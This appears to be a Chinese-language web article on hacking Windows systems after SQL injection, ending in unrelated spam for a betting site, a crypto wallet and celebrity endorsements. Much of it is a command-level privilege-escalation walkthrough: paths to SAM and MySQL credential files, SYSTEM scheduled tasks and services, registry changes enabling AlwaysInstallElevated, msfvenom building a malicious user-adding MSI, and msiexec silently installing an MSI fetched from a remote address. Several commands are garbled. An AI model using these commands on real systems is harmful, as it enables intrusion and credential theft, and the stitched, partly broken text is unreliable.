黑客倾向于通过简易方法突破系统防线,其中SQL注入乃其常用手段。利用微小的安全漏洞,他们能够轻易盗取数据库账户和密码。一旦得手,此类信息几乎等同于开启个人隐私库的通行证,得以随意查阅个人信息。此类恶意行为者非善良之辈,一旦掌握信息,便会急于搜寻更多“价值”资源。数据库配置文件(如data、sql、inc、config、conn、database)及安装文件(如data/mysql/user.myd在安装目录中)成为他们的首要目标。这些文件含有系统关键机密,若被黑客掌握,将造成严重后果。
#主机名
hostname
#查看系统名
wmic os get caption
#查看系统信息
systeminfo
#环境变量
set
#查看用户信息
net user
#查看当前安装程序
wmic product get name,version
#查看正在运行的进程列表
tasklist /svc | find "TermService"
#查看服务PID
netstat -and | find "1448"
#查看具体补丁信息
wmic qfe get Description,HotFixID,InstalledOn | findstr /C:"KBxxxxx" /C:"KBxxxxx"
#查看系统版本
C:\boot.ini
#IIS配置文件
C:\Windows\System32\inetsrv\MetaBase.XML
#存储系统初次安装的密码
C:\Windows\repair\sam
#Mysql配置
C:\Program Files\mysql\my.ini
#Mysql root
C:\Program Files\mysql\data\mysql\user.MYD
#php配置信息
C:\Windows\php.ini
#Mysql配置信息
C:\Windows\my.ini
#Windows系统的一个基本系统配置文件
C:\Windows\win.ini
遗憾的是,MySQL5.1版本为黑客提供了理想的攻击环境。黑客可轻易将udf.dll文件放置于数据库安装目录的lib\plugin子目录,从而形成一条易于利用的攻击渠道。即便后续版本移除了plugin文件夹,黑客依旧能够自行搭建,持续进行他们的“探索”。
//获取补丁信息
systeminfo或者systeminfo | findstr KB
Wmic qfe get Caption,Description,HotFixID,InstalledOn
//获取系统版本信息
systeminfo | findstr OS
注册表提权:黑客的进阶之路
夺权数据库后,黑客图谋进一步掌控整个系统,提升注册表权限为他们的下一步目标。利用Perfusion注册表提升软件,他们可在Win7、Win8、WinServer2008R2、WinServer2012等操作系统上发挥效力。此软件专门为RpcEptMapper和DnsCache服务(限于7/08R2)配置了低权限注册表项,黑客借此可轻易发起攻击,提升至更高权限。此行动犹如游戏中获得高级装备,赋予其在系统内无限穿梭的能力。
at 17:51 cmd.exe
对此,更需关注的是,攻击者能够操纵msiexec执行伪造的.mis文件,借此窃取管理员权限进而提升权限。若低权限用户具备修改该键值的权限,攻击者便可通过远程操作目标程序,窃取最高权限,达成提权目的。此行为是黑客追求的最高目标,一旦得手,黑客将能够在系统中任意妄为。
ToContinue
schtasks /Query /TN MyService2
修改注册表:黑客的终极目标
schtasks /Create /TN MyService2 /SC DAILY /ST 10:00:00 /TR cmd.exe /RU SYSTEM
schtasks /Delete /TN MyService2 /F
获得更高权限后,黑客未懈怠其行动。他们意欲篡改注册表,使恶意软件能在服务启动时自动执行,此行为无异于在系统中安置一枚定时炸弹,随时可能引爆。通过运用“regadd”命令及相应参数,黑客轻松对注册表进行篡改,达成了预定的目标。命令形式:/tREG_EXPAND_SZ/vImagePath/d"C:programdataadduser.exe"/f,针对的目标键值项:。
若持有权修改服务配置,可替换服务的启动二元文件为恶意版本,此举将在服务重新启动时执行该恶意程序,从而侵犯系统权限。
sc Create MyService binPath= "cmd /c start" type= own type= interact
sc start MyService
计划任务:黑客的时间掌控
Schtasks.exe是Windows操作系统的工具,使管理员能在指定时刻以NTAuthority\System的权限运行程序或脚本。尽管如此,该功能可能带来安全风险。黑客可能利用错误设置,赋予低权限用户访问任务目录的读写权限,进而替换目标执行脚本或程序,以提升权限。
Windows服务通常以系统级权限运行,处理包含空格的文件路径时亦复用此权限。此机制为攻击者开启了更广的操作范围,允许他们更换服务的启动二进制,以提升权限等级。
DLL的秘密:黑客的终极武器
DLL,一类库文件,支持多程序动态共享其代码与数据。此特性被黑客利用,篡改DLL文件以提升系统权限。它是黑客的核心武器,一旦控制,能对系统造成严重破坏。
黑客倾向通过最简便的途径侵入系统,其中DLL漏洞是其惯用攻击手段。他们通常利用这些漏洞替换DLL文件,进而获取更高的系统访问权限。
黑客的终极梦想:掌控一切
网络入侵者多偏爱高效入侵手段,SQL注入和注册表提权尤为常用。这些手段使黑客轻易操纵数据库、变更注册表、篡改DLL文件,从而提高访问权限。
黑客倾向于采用简易手段入侵系统,尤其是利用计划任务和DLL文件,常被他们所偏好。利用这些手段,他们能够轻松提升访问权限,实现对系统的全面掌控。
reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
你的系统安全吗?
系统稳定性是否得到确保?是否对黑客的潜在关注有所顾虑?是否评估过系统可能已被黑客操控的风险?是否意识到系统可能已成为黑客的目标?
#隐藏界面安装
msiexec /q /i xxx.msi
#远程加载安装
msiexec /q /i http://192.168.101.146/test.msi (文件后缀名可以不为.msi)
#生成恶意.msi文件
msfvenom -p windows/adduser USER=test000 PASSWORD=password123! -f msi -o rotten.msi
#执行恶意文件
msiexec /quiet /qn /i .msi文件路径
#实战情况
msf create msi:msfvenom -p windows/x64/exec cmd=calc.exe -f msi -o test.msi
#msiexec install
msiexec /quiet /qn /i
#反之uninstall msi
msiexec /quiet /uninstall
让足球滚一会提供足球、篮球、NBA赛事前瞻分析推荐,与各联赛时实新闻报道、球员转会消息、赛事录像回放等资讯,用心认真把每件事做到最好的网站。
体育即时比分网提供实时足球比分与篮球比分数据,包括即时比分、赛程、球队、竞猜等数据,让您无时无刻都能掌握时实足球比分与篮球比分动态消息。即时更新各项比赛数据与完赛结果。让足球滚一会带您体验精彩的竞猜足球比赛!
金魔网
外籍模特
:imtoken钱包为您提供最新的imtoken钱包信息,imtoken是全球最大的数字货币钱包,支持包括BTC, ETH, BSC, TRON, Aptos, Polygon, Solana, OKExChain, Polkadot, Kusama, EOS等在内的所有主流公链及Layer 2,已为全球近千万用户提供可信赖的数字货币资产管理服务,也是当前DeFi用户必备的工具钱包。
我们专注提供明星代言、商演、翻包视频、祝福视频录制等业务,十多年行业服务经验